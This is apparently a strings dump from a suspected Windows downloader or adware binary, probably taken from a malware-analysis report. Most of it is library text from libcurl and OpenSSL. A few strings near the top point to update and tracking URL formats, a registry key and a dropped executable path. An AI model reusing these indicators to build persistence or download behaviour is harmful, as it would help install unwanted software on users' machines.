%8x-%4x-%4x-%2x%2x-%2x%2x%2x%2x%2x%2x
%s-%s
%s: %d
%s: %s
HttpOpenRequest failed: %lu
HttpSendRequest failed: %lu
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
4294967295
user32.dll
%s\%s
X-X-X-X-X-X
upd_url_format
trace_url_format
reg_supd_key
Software\Wnkey
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010077\upgmsd_re_005010077.exe
All Files (*.*)
No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.
#Unable to load mail system support.
Note that if you choose to recover the auto-saved documents, you must explicitly save them to overwrite the original documents. If you choose to not recover the auto-saved versions, they will be deleted.fRecover the auto-saved documents
%s [Recovered]gmsd_re_005010077.exe_1880:
.text
`.rdata
@.data
.rsrc
@.reloc
.FGy"
uÂ&u
u.VWh8sqliuu.Wh\2 34 567%STUVF><.tn>SSSShtWSShWtl9_ tgSShu$SShet'SShlj%XtL9EFtPWSSh@BFTCPu.Ph,#ntAHt.HHts%j.ZfxSSShFTPjKSFtPj;SC.PjRV8Y%u->.uEVRR R!"RR#$RRRR%&'RRR(R)*R RRR,-.RR/0123RRRR4R5RRRRRRR6RRRRRR789:;?@ABCDERRRRFRRRRGHRRRRRIRRJKRRRRRLMRRRNNRRORRRRRRRRRPRRQL!"EEE#E$Eî&E'()EEEE*EEEEEEEE EEEEEEEEEEEE,EE-.EEEEEEEEEEE/E0EEEEEEEEEEEEEE12EE345EE6789:EEEEEEEE;?EE@EEEEEABCEEEEED%u$Vj%tCPht.Gj:WFTPGFTPj.EKSWUSHA1 block transform for x86, CRYPTOGAMS bySHA256 block transform for x86, CRYPTOGAMS byDlSHA512 block transform for x86, CRYPTOGAMS by|$@3|$Camellia for x86 by6-9'6-9'$6.:$6.:*?#1*?#1>8$4,8$4,AES for x86, CRYPTOGAMS byRC4 for x86, CRYPTOGAMS byMontgomery Multiplication for x86, CRYPTOGAMS byFtPSCB_ColorKeyCB_KeydownCB_Keyup()$^.* ?[]|\-{},:=!CNotSupportedExceptionRegOpenKeyTransactedWRegCreateKeyTransactedWRegDeleteKeyTransactedWCCmdTargetRegDeleteKeyExWCMDITabProxyWndCMDIChildWndExCMDIFrameWndExCMDIChildWndCMDIFrameWndCMDIClientAreaWndCMFCToolBarsKeyboardPropertyPageoperatorGetProcessWindowStationportuguese-brazilianF%D,3dbghelp.dll%Y-%m-%dT%H:%M:%SZCould not resolve %s: %s; %sgetaddrinfo() failed for %s:%d; %sinit_resolve_thread() failed for %s; %sAbout to connect() to %s%s port %ld (#%ld)Connected to %s (%s) port %ld (#%ld)IDN support not present, can't parse Unicode domainsProtocol %s not supported or disabled in libcurlmalformed:]://%[^
[^:]:%[^
http_proxy
%5[^:@]:%5[^@]
:%5[^@]
Port number too large: %lu
%s://%s%s%s:%hu%s%s%s
;type=%c
[%*45[0123456789abcdefABCDEF:.]%c
Couldn't find host %s in the _netrc file; using defaults
PTF@example.com
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
User-Agent: %s
Re-using existing connection! (#%ld) with host %s
%s://%s
Connection #%ld to host %s left intact
operation aborted by callback
ioctl callback returned error %d
the ioctl callback returned %d
seek callback returned error %d
Problem (%d) in the Chunked-Encoded data
HTTP server doesn't seem to support byte ranges. Cannot resume.
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
Unrecognized content encoding type. libcurl understands `identity', `deflate' and `gzip' content encodings.
Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld
Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)
Rewinding stream by : %zd bytes on url %s (zero-length body)
Operation timed out after %ld milliseconds with %lld bytes received
Operation timed out after %ld milliseconds with %lld out of %lld bytes received
Added %s:%d:%s to DNS cache
Resolve %s found illegal!
%5[^:]:%d:%5s
No URL set!
[^?&/:]://%c
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Disables POST, goes with %s
Issue another request to this URL: '%s'
unspecified error %d
%s cookie %s="%s" for domain %s, path %s, expire %lld
#HttpOnly_
skipped cookie with bad tailmatch domain: %s
skipped cookie with illegal dotcount domain: %s
httponly
23[^;
=]=I99[^;
%s%s%s
# Fatal libcurl error
# Netscape HTTP Cookie File
# hXXp://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.
WARNING: failed to save cookies in %s
[%s %s %s]
Send failure: %s
Recv failure: %s
bind failed with errno %d: %s
Local port: %hu
getsockname() failed with errno %d: %s
Bind to local port %hu failed, trying next
Couldn't bind to '%s'
Name '%s' family %i resolved to '%s' family %i
Local Interface %s is ip %s using address family %i
ssloc inet_ntop() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
getpeername() failed with errno %d: %s
TCP_NODELAY set
Could not set TCP_NODELAY: %s
Failed to connect to %s: %s
Trying %s...
sa_addr inet_ntop() failed with errno %d: %s
Unable to parse FTP file list
Error in the SSH layer
Caller must register CURLOPT_CONV_ callback options
TFTP: No such user
TFTP: Unknown transfer ID
TFTP: Illegal operation
TFTP: Access Violation
TFTP: File Not Found
Login denied
Issuer check against peer certificate failed
Invalid LDAP URL
Unrecognized or bad HTTP Content or Transfer-Encoding
Problem with the SSL CA cert (path? access rights?)
Peer certificate cannot be authenticated with given CA certificates
Problem with the local SSL certificate
SSL peer certificate or SSH remote key was not OK
An unknown option was passed in to libcurl
A libcurl function was given a bad argument
Operation was aborted by an application callback
FTP: command REST failed
FTP: command PORT failed
HTTP response code said error
FTP: couldn't retrieve (RETR failed) the specified file
FTP: couldn't set file type
FTP: can't figure out the host in the PASV response
FTP: unknown 227 response format
FTP: unknown PASV reply
FTP: unknown PASS reply
FTP: The server did not accept the PRET command.
FTP: weird server reply
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
URL using bad/illegal format or missing URL
Unsupported protocol
Winsock version not supported
Protocol family not supported
Address family not supported
Operation not supported
Socket is unsupported
Protocol is unsupported
Protocol option is unsupported
Unknown error %d (%#x)
Internal error removing splay node = %d
Internal error clearing splay node = %d
libcurl is now using a weak random seed!
not supported file type '%s' for certificate
file type P12 for certificate not supported
file type ENG for certificate not implemented
not supported file type for private key
Private key does not match the certificate public key
file type P12 for private key not supported
file type ENG for private key not supported
unable to set private key file: '%s' type %s
unable to use client certificate (no key found or wrong pass phrase?)
SSL Engine not supported
select/poll on SSL socket, errno: %d
SSL read: %s, errno %d
d-d-d d:d:d %s
common name: %s (matched)
common name: %s (does not match '%s')
SSL: certificate subject name '%s' does not match target host name '%s'
SSL: unable to obtain common name from peer certificate
SSL: illegal cert name field
subjectAltName does not match %s
subjectAltName: %s matched
CERT verify
Client key exchange
Server key exchange
CERT
Client CERT
Request CERT
Client key
SSLv%c, %s%s (%d):
SSL: SSL_set_fd failed: %s
SSL: SSL_set_session failed: %s
error loading CRL file: %s
CRLfile: %s
CAfile: %s
CApath: %s
successfully set certificate verify locations:
error setting certificate verify locations, continuing anyway:
error setting certificate verify locations:
SSL: couldn't create a context: %s
SSL connection using %s
SSL certificate problem, verify that the CA cert is OK. Details:
Unknown SSL protocol error in connection to %s:%ld
%s: %s
x:
%s(%s)
%s: %s
Signature: %s
Cert
RSA Public Key
RSA Public Key (%d bits)
pub_key
priv_key
Unable to load public key
Public Key Algorithm
Public Key Algorithm: %s
Expire date: %s
Start date: %s
Serial Number: %s
x%c
Signature Algorithm: %s
Issuer: %s
- Subject: %s
--- Certificate chain
SSL certificate verify ok.
SSL certificate verify result: %s (%ld), continuing anyway.
SSL certificate verify result: %s (%ld)
SSL certificate issuer check ok (%s)
SSL: Certificate issuer check failed (%s)
SSL: Unable to read issuer cert (%s)
SSL: Unable to open issuer cert (%s)
issuer: %s
expire date: %s
start date: %s
subject: %s
Server certificate:
SSL: couldn't get peer certificate!
SSL_write() return error %d
SSL_write() error: %s
SSL_write() returned SYSCALL, errno = %d
--:--:--
%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s
%s%s%s%s%s%s
Session: %s
%s %s RTSP/1.0
Range: %s
Referer: %s
Accept-Encoding: %s
Refusing to issue an RTSP SETUP without a Transport: header.
Transport: %s
Transport:
Refusing to issue an RTSP request [%s] without a session ID.
Got RTSP Session ID Line [%s], but wanted ID [%s]
Unable to read the CSeq header: [%s]
SMTPS
SMTP
EHLO %s
HELO %s
AUTH %s
No known auth mechanisms supported!
AUTH %s %s
LOGIN
Access denied: %d
%s xxxxxxxxxxxxxxxx
Authentication failed: %d
MAIL FROM:
MAIL FROM:%s
RCPT TO:
RCPT TO:%s
STARTTLS denied. %c
Got unexpected smtp-server response: %d
USER %s
PASS %s
Access denied. %c
Invalid message. %c
RETR %s
LIST %s
%s LOGIN %s %s
%s SELECT %s
%s FETCH 1 BODY[TEXT]
%s LOGOUT
%s STARTTLS
TFTP
set timeouts for state %d; Total %ld, retry %d maxtry %d
invalid tsize -:%s:- value in OACK packet
%s (%ld)
blksize is smaller than min supported
%s (%d)
blksize is larger than max supported
%s (%d) %s (%d)
got option=(%s) value=(%s)
tftp_rx: internal error
Timeout waiting for block %d ACK. Retries = %d
tftp_rx: giving up waiting for block %d
Received unexpected DATA packet block %d
tftp_tx: internal error, event: %i
tftp_tx: giving up waiting for block %d ack
Received ACK for block %d, expecting %d
bind() failed; %s
tftp_send_first: internal error
%s%c%s%c
TFTP finished
TFTP response timeout
Can't get the size of %s
Can't open %s for writing
Last-Modified: %s, d %s M d:d:d GMT
Couldn't open file %s
There are more than %d entries
LDAP remote: %s
LDAP local: ldap_simple_bind_s %s
LDAP local: Cannot connect to %s:%hu
LDAP local: trying to establish %s connection
LDAP local: %s
LDAP local: LDAP Vendor = %s ; LDAP Version = %d
CLIENT libcurl 7.22.0
MATCH %s %s %s
DEFINE %s %s
insufficient winsock version to support telnet
WSAStartup failed (%d)
%s %d %d
%s %s %d
%s %s %s
%s IAC %d
%s IAC %s
Sending data failed (%d)
%d (unknown)
%s (unsupported)
%s IAC SB
Syntax error in telnet option: %s
Unknown telnet option %s
7[^= ]%*[ =]%5s
USER,%s
%c%c%c%c%s%c%c
%c%s%c%s
7[^,],7s
%c%c%c%c
FreeLibrary(wsock2) failed (%d)
WSACloseEvent failed (%d)
WSAEnumNetworkEvents failed (%d)
WSACreateEvent failed (%d)
failed to find WSAEnumNetworkEvents function (%d)
failed to find WSAEventSelect function (%d)
failed to find WSACloseEvent function (%d)
failed to find WSACreateEvent function (%d)
failed to load WS2_32.DLL (%d)
WS2_32.DLL
FTPS
PORT
FTP response aborted due to select/poll error: %d
FTP response timeout
%s %s
,%d,%d
%s |%d|%s|%hu|
bind() failed, we ran out of ports!
bind(port=%hu) failed: %s
socket failure: %s
Curl_resolv failed, we can not recover!
getsockname() failed: %s
Connect data stream passively
PRET RETR %s
PRET STOR %s
PRET %s
REST %d
SIZE %s
STOR %s
APPE %s
Failed to do PORT
Got a d response code instead of the assumed 200
ftp server doesn't support SIZE
Failed FTP upload:
RETR response: d
PBSZ %d
Access denied: d
ACCT %s
ACCT rejected by server: d
TYPE %c
Connecting to %s (%s) port %d
Uploading to a URL without a file name!
MDTM %s
Bad PASV/EPSV response: d
Can't resolve new host %s:%hu
Can't resolve proxy host %s:%hu
Skips %d.%d.%d.%d for data connection, uses %s instead
%d,%d,%d,%d,%d,%d
%c%c%c%u%c
ddd d:d:d GMT
dddddd
unsupported MDTM reply format
QUOT string not accepted: %s
Wildcard - "%s" skipped by user
Wildcard - START of "%s"
CWD %s
PRET command not accepted: d
Failed to MKD dir: d
MKD %s
QUOT command failed with d
Entry path is '%s'
PROT %c
unsupported parameter to CURLOPT_FTPSSLAUTH: %d
Got a d ftp-server response when 220 was expected
server did not report OK, got %d
Remembering we are in dir "%s"
HTTPS
%sAuthorization: Basic %s
%s:%s
%s auth using %s with user '%s'
HTTP/
Avoided giant realloc for header (max is %d)!
The requested URL returned error: %d
If-Unmodified-Since: %s
Last-Modified: %s
If-Modified-Since: %s
%s, d %s M d:d:d GMT
Failed sending HTTP POST request
Content-Type: application/x-www-form-urlencoded
Internal HTTP POST error!
Failed sending HTTP request
%s%s=%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
PTF://%s:%s@%s
Content-Range: bytes %s/%lld
Content-Range: bytes %s%lld/%lld
Range: bytes=%s
PTF://
Host: %s%s%s:%hu
Host: %s%s%s
Chunky upload is not supported by HTTP 1.0
%s, TE
HTTP error before end of send, stop sending
HTTP/1.0 connection set to keep alive!
HTTP/1.1 proxy connection set close!
HTTP/1.0 proxy connection set to keep alive!
HTTP 1.0, assume close after body
RTSP/%d.%d =
HTTP =
HTTP/%d.%d =
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
SOCKS4%s request granted.
Failed to resolve "%s" for SOCKS4 connect.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
SOCKS5 GSSAPI per-message authentication is not supported.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Failed to resolve "%s" for SOCKS5 connect.
User was rejected by the SOCKS5 server (%d %d).
password
login
Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
%sAuthorization: NTLM %s
%s, algorithm="%s"
%s, opaque="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop="%s", response="%s"
%s:%s:x:%s:%s:%s
%s:%.*s
%s:%s:%s
Error while processing content unencoding: %s
1.2.0.4
d:d
%c%c==
%c%c%c=
Received HTTP code %d from proxy after CONNECT
HTTP/1.%d %d
CONNECT %s:%hu HTTP/%s
%s%s%s%s
Host: %s
%s:%hu
Establish HTTP proxy tunnel to %s:%hu
0123456789-
.jpeg
.html
--%s--
couldn't open file "%s"
Content-Type: %s
; filename="%s"
Content-Disposition: attachment; filename="%s"
Content-Type: multipart/mixed, boundary=%s
%s; boundary=%s
NTLMSSP%c
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%s%s
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c
KGS!@#$%.rnd
\X
X.509 part of OpenSSL 1.0.0e 6 Sep 2011
OPENSSL_ALLOW_PROXY_CERTS
passed a null parameter
DSO support routines
x509 certificate routines
error:lX:%s:%s:%s
ASN.1 part of OpenSSL 1.0.0e 6 Sep 2011
d.registeredID
d.iPAddress
d.uniformResourceIdentifier
d.ediPartyName
d.directoryName
d.dNSName
d.rfc822Name
d.otherName
Stack part of OpenSSL 1.0.0e 6 Sep 2011
x%s
%s - d:d:d%.*s %d%s
%*s
%*s%s
%*s%s:
CERTIFICATE
Big Number part of OpenSSL 1.0.0e 6 Sep 2011
unsupported or invalid name syntax
unsupported or invalid name constraint syntax
unsupported name constraint type
name constraints minimum and maximum not supported
Unsupported extension feature
invalid or inconsistent certificate policy extension
invalid or inconsistent certificate extension
key usage does not include digital signature
key usage does not include CRL signing
unable to get CRL issuer certificate
key usage does not include certificate signing
authority and subject key identifier mismatch
certificate rejected
certificate not trusted
unsupported certificate purpose
proxy certificates not allowed, please set the appropriate flag
invalid non-CA certificate (has CA markings)
invalid CA certificate
certificate revoked
certificate chain too long
unable to verify the first certificate
unable to get local issuer certificate
self signed certificate in certificate chain
self signed certificate
format error in certificate's notAfter field
format error in certificate's notBefore field
certificate has expired
certificate is not yet valid
certificate signature failure
unable to decode issuer public key
unable to decrypt certificate's signature
unable to get certificate CRL
unable to get issuer certificate
cert_info
OpenSSL 1.0.0e 6 Sep 2011
MD5 part of OpenSSL 1.0.0e 6 Sep 2011
libdes part of OpenSSL 1.0.0e 6 Sep 2011
DES part of OpenSSL 1.0.0e 6 Sep 2011
MD4 part of OpenSSL 1.0.0e 6 Sep 2011
RAND part of OpenSSL 1.0.0e 6 Sep 2011
You need to read the OpenSSL FAQ, hXXp://VVV.openssl.org/support/faq.html
RSA part of OpenSSL 1.0.0e 6 Sep 2011
DSA part of OpenSSL 1.0.0e 6 Sep 2011
.\crypto\ec\ec_key.c
Diffie-Hellman part of OpenSSL 1.0.0e 6 Sep 2011
supportedAlgorithms
crossCertificatePair
certificateRevocationList
cACertificate
userCertificate
userPassword
supportedApplicationContext
Microsoft Local Key set
LocalKeySet
id-Gost28147-89-None-KeyMeshing
id-Gost28147-89-CryptoPro-KeyMeshing
password based MAC
id-PasswordBasedMAC
X509v3 Certificate Issuer
certificateIssuer
certicom-arc
Proxy Certificate Information
proxyCertInfo
Microsoft Smartcardlogin
msSmartcardLogin
joint-iso-itu-t
JOINT-ISO-ITU-T
set-rootKeyThumb
setAttr-Cert
setCext-cCertRequired
setCext-certType
setct-CertResTBE
setct-CertReqTBEX
setct-CertReqTBE
setct-AcqCardCodeMsgTBE
setct-CertInqReqTBS
setct-CertResData
setct-CertReqTBS
setct-CertReqData
setct-PCertResTBS
setct-PCertReqData
setct-AcqCardCodeMsg
certificate extensions
set-certExt
set-msgExt
id-ecPublicKey
id-cmc-confirmCertAcceptance
id-cmc-getCert
id-regInfo-certReq
id-regCtrl-protocolEncrKey
id-regCtrl-oldCertID
id-it-revPassphrase
id-it-keyPairParamRep
id-it-keyPairParamReq
id-it-unsupportedOIDs
id-it-caKeyUpdateInfo
id-it-encKeyPairTypes
id-it-signKeyPairTypes
id-it-caProtEncCert
id-mod-attribute-cert
id-mod-qualified-cert-93
id-mod-qualified-cert-88
id-smime-aa-ets-certCRLTimestamp
id-smime-aa-ets-certValues
id-smime-aa-ets-CertificateRefs
id-smime-aa-ets-otherSigCert
id-smime-aa-smimeEncryptCerts
id-smime-aa-signingCertificate
id-smime-aa-encrypKeyPref
id-smime-aa-msgSigDigest
id-smime-ct-publishCert
id-smime-mod-msg-v3
sdsiCertificate
x509Certificate
localKeyID
certBag
pkcs8ShroudedKeyBag
keyBag
pbeWithSHA1And2-KeyTripleDES-CBC
pbeWithSHA1And3-KeyTripleDES-CBC
TLS Web Client Authentication
TLS Web Server Authentication
X509v3 Extended Key Usage
extendedKeyUsage
X509v3 Authority Key Identifier
authorityKeyIdentifier
X509v3 Certificate Policies
certificatePolicies
X509v3 Private Key Usage Period
privateKeyUsagePeriod
X509v3 Key Usage
keyUsage
X509v3 Subject Key Identifier
subjectKeyIdentifier
Netscape Certificate Sequence
nsCertSequence
Netscape CA Policy Url
nsCaPolicyUrl
Netscape Renewal Url
nsRenewalUrl
Netscape CA Revocation Url
nsCaRevocationUrl
Netscape Revocation Url
nsRevocationUrl
Netscape Base Url
nsBaseUrl
Netscape Cert Type
nsCertType
Netscape Certificate Extension
nsCertExt
extendedCertificateAttributes
challengePassword
dhKeyAgreement
value.single
value.set
ssl_sess_cert
ssl_cert
evp_pkey
x509_pkey
%s(%d): OpenSSL internal error, assertion failed: %s
X509_PUBKEY
public_key
.\crypto\asn1\x_pubkey.c
appl [ %d ]
cont [ %d ]
priv [ %d ]
'() ,-./:=?
%d.%d.%d.%d/%d.%d.%d.%d
ddddddZ
ddddddZ
lhash part of OpenSSL 1.0.0e 6 Sep 2011
TRUSTED CERTIFICATE
CERTIFICATE REQUEST
NEW CERTIFICATE REQUEST
RSA PRIVATE KEY
DSA PRIVATE KEY
EC PRIVATE KEY
X509 CERTIFICATE
/usr/local/ssl/certs
/usr/local/ssl/cert.pem
SSL_CERT_DIR
SSL_CERT_FILE
%lu:%s:%s:%d:%s
%sx -
x -
PEM part of OpenSSL 1.0.0e 6 Sep 2011
phrase is too short, needs to be at least %d chars
Enter PEM pass phrase:
PRIVATE KEY
ENCRYPTED PRIVATE KEY
ANY PRIVATE KEY
name.relativename
name.fullname
certificateHold
Certificate Hold
cessationOfOperation
Cessation Of Operation
keyCompromise
Key Compromise
%*sOnly Attribute Certificates
%*sOnly CA Certificates
%*sOnly User Certificates
PROXY_CERT_INFO_EXTENSION
AUTHORITY_KEYID
keyid
X509_CERT_PAIR
X509_CERT_AUX
USER32.DLL
NETAPI32.DLL
KERNEL32.DLL
ADVAPI32.DLL
EC part of OpenSSL 1.0.0e 6 Sep 2011
.\crypto\dh\dh_key.c
%s: (%d bit)
Public-Key
Private-Key
recommended-private-length: %d bits
public-key:
private-key:
PKCS#3 DH Public-Key
PKCS#3 DH Private-Key
Public-Key: (%d bit)
Private-Key: (%d bit)
SHA1 part of OpenSSL 1.0.0e 6 Sep 2011
SHA-256 part of OpenSSL 1.0.0e 6 Sep 2011
SHA-512 part of OpenSSL 1.0.0e 6 Sep 2011
IP Address:%d.%d.%d.%d
URI:%s
DNS:%s
email:%s
EdiPartyName:
X400Name:
othername:
pubkey
enc_key
key_enc_algor
cert
d.encrypted
d.digest
d.signed_and_enveloped
d.enveloped
d.sign
d.data
d.other
EC_PRIVATEKEY
publicKey
privateKey
value.implicitlyCA
value.parameters
value.named_curve
p.char_two
p.prime
p.ppBasis
p.tpBasis
p.onBasis
p.other
PKCS8_PRIV_KEY_INFO
pkey
pkeyalg
.\crypto\evp\evp_pkey.c
keylenEVP_CIPHER_key_length(cipher)%*sPolicy Text: %s%*scrlUrl:EXTENDED_KEY_USAGE%*sZone: %s, User:.\crypto\x509v3\v3_akey.cd.usernoticed.cpsuriCERTIFICATEPOLICIES%*sExplicit Text: %s%*sNumber%s:%*sOrganization: %s%*sCPS: %sPKEY_USAGE_PERIODkeyCertSignCertificate SignkeyAgreementKey AgreementkeyEnciphermentKey Encipherment.\crypto\x509v3\v3_skey.cNETSCAPE_CERT_SEQUENCEcerts.\crypto\pem\pem_pkey.c.\crypto\asn1\x_pkey.c.\crypto\evp\evp_key.cnkeyEVP part of OpenSSL 1.0.0e 6 Sep 2011?456789:;!"#$%&'()* ,-./0123ECDSA part of OpenSSL 1.0.0e 6 Sep 2011Basis Type: %sField Type: %sASN1 OID: %s%s %s%lu (%s0x%lx)hexkeyrsa_keygen_pubexprsa_keygen_bitsRIPE-MD160 part of OpenSSL 1.0.0e 6 Sep 2011SHA part of OpenSSL 1.0.0e 6 Sep 2011CAST part of OpenSSL 1.0.0e 6 Sep 2011Blowfish part of OpenSSL 1.0.0e 6 Sep 2011RC2 part of OpenSSL 1.0.0e 6 Sep 2011.pp@0aEÃ(#EÚÚEIDEA part of OpenSSL 1.0.0e 6 Sep 2011len>=0 && lenkey)j key)keylengthkeyfunc.\crypto\pkcs12\p12_key.ccrlUrlcertStatuscertIdOCSP_CERTSTATUSvalue.unknownvalue.revokedvalue.goodvalue.byKeyvalue.byNamereqCertOCSP_CERTIDissuerKeyHashCONF part of OpenSSL 1.0.0e 6 Sep 2011%'%1$=%C%K%O%s%.%.-.3.7.9.?.W.[.o.y.C%C'C3C7C9COCWCiCd.receiptListd.allOrFirstTierd.compressedDatad.authenticatedDatad.encryptedDatad.digestedDatad.envelopedDatad.signedDatad.orid.pwrid.kekrid.karid.ktriCMS_PasswordRecipientInfokeyDerivationAlgorithmkeyIdentifierCMS_KeyAgreeRecipientInforecipientEncryptedKeysCMS_OriginatorIdentifierOrKeyd.originatorKeyCMS_OriginatorPublicKeyCMS_RecipientEncryptedKeyCMS_KeyAgreeRecipientIdentifierd.rKeyIdCMS_RecipientKeyIdentifierCMS_OtherKeyAttributekeyAttrkeyAttrIdCMS_KeyTransRecipientInfoencryptedKeykeyEncryptionAlgorithmcertificatesd.crld.subjectKeyIdentifierd.issuerAndSerialNumberCMS_CertificateChoicesd.v2AttrCertd.v1AttrCertd.extendedCertificated.certificateCMS_OtherCertificateFormatotherCertotherCertFormatCONF_def part of OpenSSL 1.0.0e 6 Sep 2011[[%s]][%s] %s=%sVerifying - %sECDH part of OpenSSL 1.0.0e 6 Sep 2011value.bagvalue.safesvalue.shkeybagvalue.keybagvalue.sdsicertvalue.x509certvalue.other%s.dll%-23s %s Kx=%-8s Au=%-4s Enc=%-9s Mac=%-4s%sEXPORT56EXPORT40EXPORT.\ssl\ssl_cert.cwrong number of key bitsunsupported status typeunsupported ssl versionunsupported protocolunsupported elliptic curveunsupported digest typeunsupported compression algorithmunsupported cipherunknown pkey typeunknown key exchange typeunknown certificate typeunable to find public key parametersunable to extract public keyunable to decode ecdh certsunable to decode dh certstried to use unsupported ciphertls peer did not respond with certificate listtls client cert req with anon ciphertlsv1 unsupported extensiontlsv1 certificate unobtainabletlsv1 bad certificate status responsetlsv1 bad certificate hash valuetlsv1 alert export restrictionsslv3 alert unsupported certificatesslv3 alert no certificatesslv3 alert certificate unknownsslv3 alert certificate revokedsslv3 alert certificate expiredsslv3 alert bad certificatesignature for non signing certificatereuse cert type not zeroreuse cert length not zeropublic key not rsapublic key is not rsapublic key encrypt errorpeer error unsupported certificate typepeer error no certificatepeer error certificatepeer did not return a certificatenull ssl method passedno publickeyno private key assignedno privatekeyPeer haven't sent GOST certificate, required for selected ciphersuiteno client cert receivedno client cert methodno ciphers passedno certificate specifiedno certificate setno certificate returnedno certificate assignedno certificates returnedmissing tmp rsa pkeymissing tmp rsa keymissing tmp ecdh keymissing tmp dh keymissing rsa signing certmissing rsa encrypting certmissing rsa certificatemissing export tmp rsa keymissing export tmp dh keymissing dsa signing certmissing dh rsa certmissing dh keymissing dh dsa certkrb5 server rd_req (keytab perms?)key arg too longinvalid ticket keys lengthhttp requesthttps proxy requesterror generating tmp rsa keyecc cert should have sha1 signatureecc cert should have rsa signatureecc cert not for signingecc cert not for key agreementcert length mismatchcertificate verify failedbad ecc certbad dh pub key lengthTLS1_SETUP_KEY_BLOCKtls1_cert_verify_macSSL_VERIFY_CERT_CHAINSSL_use_RSAPrivateKey_fileSSL_use_RSAPrivateKey_ASN1SSL_use_RSAPrivateKeySSL_use_PrivateKey_fileSSL_use_PrivateKey_ASN1SSL_use_PrivateKeySSL_use_certificate_fileSSL_use_certificate_ASN1SSL_use_certificateSSL_SET_PKEYSSL_SET_CERTSSL_SESS_CERT_NEWSSL_GET_SIGN_PKEYSSL_GET_SERVER_SEND_CERTSSL_CTX_use_RSAPrivateKey_fileSSL_CTX_use_RSAPrivateKey_ASN1SSL_CTX_use_RSAPrivateKeySSL_CTX_use_PrivateKey_fileSSL_CTX_use_PrivateKey_ASN1SSL_CTX_use_PrivateKeySSL_CTX_use_certificate_fileSSL_CTX_use_certificate_chain_fileSSL_CTX_use_certificate_ASN1SSL_CTX_use_certificateSSL_CTX_set_client_cert_engineSSL_CTX_check_private_keySSL_CHECK_SRVR_ECC_CERT_AND_ALGSSL_check_private_keySSL_CERT_NEWSSL_CERT_INSTANTIATESSL_CERT_INSTSSL_CERT_DUPSSL_add_file_cert_subjects_to_stackSSL_add_dir_cert_subjects_to_stackSSL3_SETUP_KEY_BLOCKSSL3_SEND_SERVER_KEY_EXCHANGESSL3_SEND_SERVER_CERTIFICATESSL3_SEND_CLIENT_KEY_EXCHANGESSL3_SEND_CLIENT_CERTIFICATESSL3_SEND_CERTIFICATE_REQUESTSSL3_OUTPUT_CERT_CHAINSSL3_GET_SERVER_CERTIFICATESSL3_GET_KEY_EXCHANGESSL3_GET_CLIENT_KEY_EXCHANGESSL3_GET_CLIENT_CERTIFICATESSL3_GET_CERT_VERIFYSSL3_GET_CERT_STATUSSSL3_GET_CERTIFICATE_REQUESTSSL3_GENERATE_KEY_BLOCKSSL3_CHECK_CERT_AND_ALGORITHMSSL3_ADD_CERT_TO_BUFSSL2_SET_CERTIFICATESSL2_GENERATE_KEY_MATERIALREQUEST_CERTIFICATEGET_CLIENT_MASTER_KEYDTLS1_SEND_SERVER_KEY_EXCHANGEDTLS1_SEND_SERVER_CERTIFICATEDTLS1_SEND_CLIENT_KEY_EXCHANGEDTLS1_SEND_CLIENT_CERTIFICATEDTLS1_SEND_CERTIFICATE_REQUESTDTLS1_OUTPUT_CERT_CHAINDTLS1_ADD_CERT_TO_BUFCLIENT_MASTER_KEYCLIENT_CERTIFICATETLSv1 part of OpenSSL 1.0.0e 6 Sep 2011SSLv3 part of OpenSSL 1.0.0e 6 Sep 2011SSLv2 part of OpenSSL 1.0.0e 6 Sep 2011s->session->master_key_length >= 0 && s->session->master_key_length session->master_key)c->iv_len session->key_arg)s->s2->key_material_length s2->key_materialkey expansionclient write keyserver write keyVisual C CRT: Not enough memory to complete call to strerror.Broken pipeInappropriate I/O control operationOperation not permitted.\crypto\engine\eng_pkey.cLoad certs from files in a directory%s%clx.%s%dunsupported typeunsupported recpientinfo typeunsupported recipient typeunsupported kek algorithmunsupported content typesigner certificate not foundprivate key does not match certificateno public keyno private keyno msgsigdigestno key or certno keynot supported for this key typenot key transportmsgsigdigest wrong lengthmsgsigdigest verification failuremsgsigdigest errorinvalid key lengthinvalid encrypted key lengtherror setting keyerror getting public keycertificate verify errorcertificate has no keyidcertificate already 